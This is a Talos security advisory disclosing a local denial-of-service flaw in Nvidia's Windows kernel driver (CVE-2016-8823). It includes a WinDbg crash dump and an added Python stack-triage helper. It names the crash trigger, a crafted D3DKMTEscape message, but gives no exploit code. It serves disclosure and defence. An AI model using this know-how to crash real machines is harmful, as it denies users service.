Talos Vulnerability Report

TALOS-2016-0217

Nvidia Windows Kernel Mode Driver Denial Of Service

December 14, 2016
CVE Number

CVE-2016-8823

Summary

A local denial of service vulnerability exists in the communication functionality of the Nvidia Windows Kernel Mode Driver. A specially crafted message can trigger the vulnerability, resulting in a machine crash (BSOD). A local attacker can send such a message to trigger this vulnerability.

Tested Versions

(Requires physical machine)
- Nvidia Windows Kernel Mode Driver, 372.70 (21.21.13.7270)
- Nvidia Windows Kernel Mode Driver, 372.90 (21.21.13.7290)

Product URLs

http://nvidia.com

CVSSv3 Score

5.5 - CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Details

A local denial of service vulnerability exists in the communication functionality of the Nvidia Windows Kernel Mode Driver. A specially crafted D3DKMTEscape message can trigger the vulnerability, resulting in a machine crash (BSOD). A local attacker can send such a message to trigger this vulnerability.


This bug happens because the Nvidia driver (nvlddmkm) calls the ZwSetValueKey API with an invalid argument. The crash dump below shows the resulting fault inside nt!memcpy, reached from nt!CmpSetValueDataNew while the registry code copies the value data passed in.

Crash Information

0: kd> !analyze -v
*******************************************************************************
*                                                                             *
*                        Bugcheck Analysis                                    *
*                                                                             *
*******************************************************************************

PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced.  This cannot be protected by try-except,
it must be protected by a Probe.  Typically the address is just plain bad or it
is pointing at freed memory.
Arguments:
Arg1: ffffd00026a46000, memory referenced.
Arg2: 0000000000000000, value 0 = read operation, 1 = write operation.
Arg3: fffff801b0bcfc20, If non-zero, the instruction address which referenced the bad memory
    address.
Arg4: 0000000000000000, (reserved)

Debugging Details:
------------------


READ_ADDRESS:  ffffd00026a46000

FAULTING_IP:
nt!memcpy+a0
fffff801`b0bcfc20 f30f6f040a      movdqu  xmm0,xmmword ptr [rdx+rcx]

MM_INTERNAL_CODE:  0

DEFAULT_BUCKET_ID:  WIN8_DRIVER_FAULT

BUGCHECK_STR:  AV

PROCESS_NAME:  intel1.exe

CURRENT_IRQL:  0

ANALYSIS_VERSION: 6.3.9600.17298 (debuggers(dbg).141024-1500) amd64fre

TRAP_FRAME:  ffffd00026a44670 -- (.trap 0xffffd00026a44670)
NOTE: The trap frame does not contain all registers.
Some register values may be zeroed or incorrect.
rax=0000000000000000 rbx=0000000000000000 rcx=ffffc001f8688670
rdx=00000ffe2e3bd988 rsi=0000000000000000 rdi=0000000000000000
rip=fffff801b0bcfc20 rsp=ffffd00026a44808 rbp=00000000000054e1
 r8=000000000000000c  r9=00000000000001cc r10=ffffe00152d2ae68
r11=ffffc001f8688024 r12=0000000000000000 r13=0000000000000000
r14=0000000000000000 r15=0000000000000000
iopl=0         nv up ei pl nz na po nc
nt!memcpy+0xa0:
fffff801`b0bcfc20 f30f6f040a      movdqu  xmm0,xmmword ptr [rdx+rcx] ds:ffffd000`26a45ff8=????????????????????????????????
Resetting default scope

LAST_CONTROL_TRANSFER:  from fffff801b0bde42c to fffff801b0bc33a0

STACK_TEXT:
ffffd000`26a44408 fffff801`b0bde42c : 00000000`00000050 ffffd000`26a46000 00000000`00000000 ffffd000`26a44670 : nt!KeBugCheckEx
ffffd000`26a44410 fffff801`b0af2d09 : 00000000`00000000 ffffe001`5c91b080 ffffd000`26a44670 00000000`00000000 : nt! ?? ::FNODOBFM::`string'+0xab6c
ffffd000`26a444b0 fffff801`b0bcd62f : 00000000`00000000 ffffc001`f008dfc4 00000000`00000000 00000000`00000000 : nt!MmAccessFault+0x769
ffffd000`26a44670 fffff801`b0bcfc20 : fffff801`b0f26473 ffffe001`5d517301 ffffc001`00000006 ffffc001`f008dfc4 : nt!KiPageFault+0x12f
ffffd000`26a44808 fffff801`b0f26473 : ffffe001`5d517301 ffffc001`00000006 ffffc001`f008dfc4 ffffd000`26a44860 : nt!memcpy+0xa0
ffffd000`26a44810 fffff801`b0fbcd18 : ffffc001`f8688024 00000000`00000000 00000000`001e8480 ffffc001`ee828000 : nt!CmpSetValueDataNew+0x157
ffffd000`26a44860 fffff801`b0f0f588 : 01d21329`ff575fe0 ffffd000`26a44991 ffffc001`f170fa70 00000025`00000003 : nt! ?? ::NNGAKEGL::`string'+0x27928
ffffd000`26a448d0 fffff801`b0e3a977 : ffffc001`f7837b50 ffffd000`26a44a40 ffffc001`00000003 ffffd000`26a459ac : nt!CmSetValueKey+0x784
ffffd000`26a449e0 fffff801`b0bcebb3 : ffffc001`ee8763a0 ffffd000`26a44c40 00000000`00000000 fffff801`b0e9bc1e : nt!NtSetValueKey+0x55f
ffffd000`26a44bb0 fffff801`b0bc7020 : fffff801`4175a51a 00000000`000054e1 ffffd000`26a44e31 ffffd000`26a459ac : nt!KiSystemServiceCopyEnd+0x13
ffffd000`26a44db8 fffff801`4175a51a : 00000000`000054e1 ffffd000`26a44e31 ffffd000`26a459ac 00000000`000054e1 : nt!KiServiceLinkage
ffffd000`26a44dc0 fffff801`4175a051 : 00000000`000054e1 ffffd000`26a459ac 00000000`000054e1 00000000`000054e1 : nvlddmkm+0xb751a
ffffd000`26a44e80 fffff801`417944e7 : fffff801`41759fc0 ffffd000`26a45870 ffffd000`26a450b0 00000000`00000140 : nvlddmkm+0xb7051
ffffd000`26a44f20 fffff801`41763faf : 00000000`00000000 fffff801`b0dc97e0 ffffe001`52d2a080 ffffc001`ee803000 : nvlddmkm+0xf14e7
ffffd000`26a44f70 fffff801`41f44769 : ffffd000`26a45508 ffffd000`26a450b0 ffffd000`26a45870 00000000`00000000 : nvlddmkm+0xc0faf
ffffd000`26a44fb0 fffff801`41f39e24 : ffffd000`26a45448 ffffd000`26a45658 ffffe001`5d517080 fffff801`b0bcebb3 : nvlddmkm!nvDumpConfig+0x1253a1
ffffd000`26a45410 fffff801`41f44136 : ffffe001`5665a000 ffffd000`26a45519 00000000`00000000 ffffe001`56a96000 : nvlddmkm!nvDumpConfig+0x11aa5c
ffffd000`26a45450 fffff801`41efb43d : ffffd000`26a45780 ffffd000`26a455e9 ffffd000`26a45780 ffffe001`5665a000 : nvlddmkm!nvDumpConfig+0x124d6e
ffffd000`26a45580 fffff801`413604f8 : 00000000`00000002 ffffe001`5c825220 00000000`4e562a2a 00000000`01000003 : nvlddmkm!nvDumpConfig+0xdc075
ffffd000`26a45650 fffff801`413c5b4e : 00000000`00000000 ffffd000`26a45b80 ffffd000`26a45ad0 fffff801`41463b98 : dxgkrnl!DXGADAPTER::DdiEscape+0x48
ffffd000`26a45680 fffff960`002d41d3 : ffffe001`5a294010 ffffe001`5d517080 00000000`7f82f000 ffffe001`5a294010 : dxgkrnl!DxgkEscape+0x802
ffffd000`26a45ab0 fffff801`b0bcebb3 : ffffe001`5d517080 00000000`7f82d000 00000000`0013fdb0 00000000`00000000 : win32k!NtGdiDdDDIEscape+0x53
ffffd000`26a45b00 00000000`773d74aa : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nt!KiSystemServiceCopyEnd+0x13
00000000`0013dfd8 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : 0x773d74aa


STACK_COMMAND:  kb

FOLLOWUP_IP:
nvlddmkm+b751a
fffff801`4175a51a 85c0            test    eax,eax

SYMBOL_STACK_INDEX:  b

SYMBOL_NAME:  nvlddmkm+b751a

FOLLOWUP_NAME:  MachineOwner

MODULE_NAME: nvlddmkm

IMAGE_NAME:  nvlddmkm.sys

DEBUG_FLR_IMAGE_TIMESTAMP:  57bf5593

FAILURE_BUCKET_ID:  AV_nvlddmkm+b751a

BUCKET_ID:  AV_nvlddmkm+b751a

ANALYSIS_SOURCE:  KM

FAILURE_ID_HASH_STRING:  km:av_nvlddmkm+b751a

FAILURE_ID_HASH:  {4bb56d14-bad0-e413-eed6-722441b0442f}

Followup: MachineOwner
---------
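To show how the dump above supports the root-cause statement (a third-party driver entering NtSetValueKey through KiServiceLinkage, with the fault landing in the registry code's memcpy), here is an added triage helper written for this page, not part of the Talos advisory or of any Nvidia code; it parses WinDbg STACK_TEXT frames excerpted from the dump above, and the list of first-party kernel modules it uses is an assumption.

```python
import re
from dataclasses import dataclass
from typing import Optional

# STACK_TEXT frames excerpted from the advisory's !analyze -v output.
STACK_TEXT = """\
ffffd000`26a44408 fffff801`b0bde42c : 00000000`00000050 ffffd000`26a46000 00000000`00000000 ffffd000`26a44670 : nt!KeBugCheckEx
ffffd000`26a44410 fffff801`b0af2d09 : 00000000`00000000 ffffe001`5c91b080 ffffd000`26a44670 00000000`00000000 : nt! ?? ::FNODOBFM::`string'+0xab6c
ffffd000`26a44670 fffff801`b0bcfc20 : fffff801`b0f26473 ffffe001`5d517301 ffffc001`00000006 ffffc001`f008dfc4 : nt!KiPageFault+0x12f
ffffd000`26a44808 fffff801`b0f26473 : ffffe001`5d517301 ffffc001`00000006 ffffc001`f008dfc4 ffffd000`26a44860 : nt!memcpy+0xa0
ffffd000`26a44810 fffff801`b0fbcd18 : ffffc001`f8688024 00000000`00000000 00000000`001e8480 ffffc001`ee828000 : nt!CmpSetValueDataNew+0x157
ffffd000`26a449e0 fffff801`b0bcebb3 : ffffc001`ee8763a0 ffffd000`26a44c40 00000000`00000000 fffff801`b0e9bc1e : nt!NtSetValueKey+0x55f
ffffd000`26a44bb0 fffff801`b0bc7020 : fffff801`4175a51a 00000000`000054e1 ffffd000`26a44e31 ffffd000`26a459ac : nt!KiSystemServiceCopyEnd+0x13
ffffd000`26a44db8 fffff801`4175a51a : 00000000`000054e1 ffffd000`26a44e31 ffffd000`26a459ac 00000000`000054e1 : nt!KiServiceLinkage
ffffd000`26a44dc0 fffff801`4175a051 : 00000000`000054e1 ffffd000`26a459ac 00000000`000054e1 00000000`000054e1 : nvlddmkm+0xb751a
ffffd000`26a45650 fffff801`413c5b4e : 00000000`00000000 ffffd000`26a45b80 ffffd000`26a45ad0 fffff801`41463b98 : dxgkrnl!DXGADAPTER::DdiEscape+0x48
00000000`0013dfd8 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : 0x773d74aa
"""

# First-party kernel images; any other module on the stack is treated as a
# third-party driver (assumption: this set suffices for a display-driver crash).
MICROSOFT_MODULES = {"nt", "hal", "dxgkrnl", "dxgmms1", "dxgmms2", "win32k", "win32kbase"}
_MODULE_RE = re.compile(r"^([A-Za-z0-9_]+)(?=[!+])")

def frames(stack_text):
    """Return the 'module!symbol+offset' column of each STACK_TEXT line."""
    return [ln.rsplit(" : ", 1)[1].strip() for ln in stack_text.splitlines() if " : " in ln]

def module_of(frame):
    m = _MODULE_RE.match(frame)
    return m.group(1) if m else None  # None for bare addresses such as 0x773d74aa

@dataclass
class Triage:
    fault_frame: str             # instruction that touched the bad address
    fault_caller: str            # kernel routine that called it
    service: Optional[str]       # Nt* system service in progress, if any
    driver_frame: Optional[str]  # first frame owned by a third-party driver
    driver_module: Optional[str]

def triage(stack_text):
    fr = frames(stack_text)
    # The frame right after KiPageFault is the one that raised the fault.
    trap = next(i for i, f in enumerate(fr) if f.startswith("nt!KiPageFault"))
    # KiServiceLinkage marks a Zw* call from kernel mode: the Nt* service sits
    # above it on the stack and the in-kernel caller directly below it.
    link = next((i for i, f in enumerate(fr) if f.startswith("nt!KiServiceLinkage")), None)
    service = None if link is None else next((f for f in fr[link::-1] if f.startswith("nt!Nt")), None)
    drv = next((f for f in fr if module_of(f) and module_of(f) not in MICROSOFT_MODULES), None)
    return Triage(fr[trap + 1], fr[trap + 2], service, drv, module_of(drv) if drv else None)
```

Running `triage(STACK_TEXT)` attributes the fault to nvlddmkm entering nt!NtSetValueKey, which is the chain the root-cause sentence describes.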

Timeline

2016-09-30 - Initial Discovery
2016-10-17 - Vendor Notification
2016-12-14 - Public Disclosure

Credit

Discovered by Piotr Bania of Cisco Talos.